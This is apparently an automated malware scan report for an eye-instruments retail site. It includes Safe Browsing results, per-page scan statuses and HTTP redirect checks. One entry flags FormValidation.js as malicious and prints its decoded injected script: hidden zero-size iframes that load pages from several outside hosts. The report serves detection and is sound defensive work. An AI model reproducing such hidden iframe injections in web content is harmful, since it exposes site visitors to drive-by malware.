Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=eye-instruments.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://eye-instruments.com/ | 200 OK Content-Length: 19823 Content-Type: text/html | clean |
http://eye-instruments.com/home.htm | 200 OK Content-Length: 14137 Content-Type: text/html | clean |
http://eye-instruments.com/cart.asp | 200 OK Content-Length: 13619 Content-Type: text/html | clean |
http://eye-instruments.com/home.asp | 200 OK Content-Length: 19823 Content-Type: text/html | clean |
http://eye-instruments.com/search.asp?cat=aa11 | 200 OK Content-Length: 36295 Content-Type: text/html | clean |
http://eye-instruments.com/search.asp?cat=aa12 | 200 OK Content-Length: 36140 Content-Type: text/html | clean |
http://eye-instruments.com/search.asp?cat=aa13 | 200 OK Content-Length: 36750 Content-Type: text/html | clean |
http://eye-instruments.com/search.asp?cat=aa14 | 200 OK Content-Length: 36420 Content-Type: text/html | clean |
http://eye-instruments.com/enquiry.asp | 200 OK Content-Length: 18553 Content-Type: text/html | clean |
http://eye-instruments.com/FormValidation.js | 200 OK Content-Length: 30118 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function UsernameValid(Data1)
{ while(''+Data1.value.charAt(0)==' ') { Data1.value=Data1.value.substring(1,Data1.value.length); } while(''+Data1.value.charAt(Data1.value.length-1)==' ') { Data1.value=Data1.value.substring(0,Data1.value.length-1); } var allValid = true; if (Data1.value != "") { var ch = "0123456789_-"; var Str1 = Data1.value; ch1=Str1.charAt(0) Decoded script: <iframe src="http://www2.mcgregart.com/in.cgi?2" width=0 height=0 frameborder=0></iframe><iframe src="http://emails.surreyhill2.com/in.cgi?default" width=0 height=0 frameborder=0></iframe><iframe src="http://android.womenthemanual.com/count" width=0 height=0 frameborder=0></iframe><iframe src="http://analytics.rebel5.com/stat.js" width=0 height=0 frameborder=0></iframe><iframe src="http://46.4.163.208/counter.js" width=0 height=0 frameborde Antivirus reports:
| ||
http://eye-instruments.com/contact.asp | 200 OK Content-Length: 12508 Content-Type: text/html | clean |
http://eye-instruments.com/feedback.asp | 200 OK Content-Length: 19550 Content-Type: text/html | clean |
http://eye-instruments.com/test404page.js | 404 Not Found Content-Length: 1245 Content-Type: text/html | clean |
http://eye-instruments.com/Search.asp?Move=1 | 500 Internal Server Error Content-Length: 1208 Content-Type: text/html | clean |
http://eye-instruments.com/Search.asp?Move=2 | 500 Internal Server Error Content-Length: 1208 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: eye-instruments.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 03 Mar 2015 08:21:14 GMT
Server: Microsoft-IIS/7.5
Content-Length: 19823
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQSRATBQ=BMFLGDJCCBECJOMEAHJMPEMH; path=/
X-Powered-By: ASP.NET
...19823 bytes of data.
GET / HTTP/1.1
Host: eye-instruments.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 03 Mar 2015 08:21:14 GMT
Server: Microsoft-IIS/7.5
Content-Length: 19823
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQSRATBQ=BMFLGDJCCBECJOMEAHJMPEMH; path=/
X-Powered-By: ASP.NET
...19823 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: eye-instruments.com
Referer: http://www.google.com/search?q=eye-instruments.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: eye-instruments.com
Referer: http://www.google.com/search?q=eye-instruments.com
Result:
The result is similar to the first query. There are no suspicious redirects found.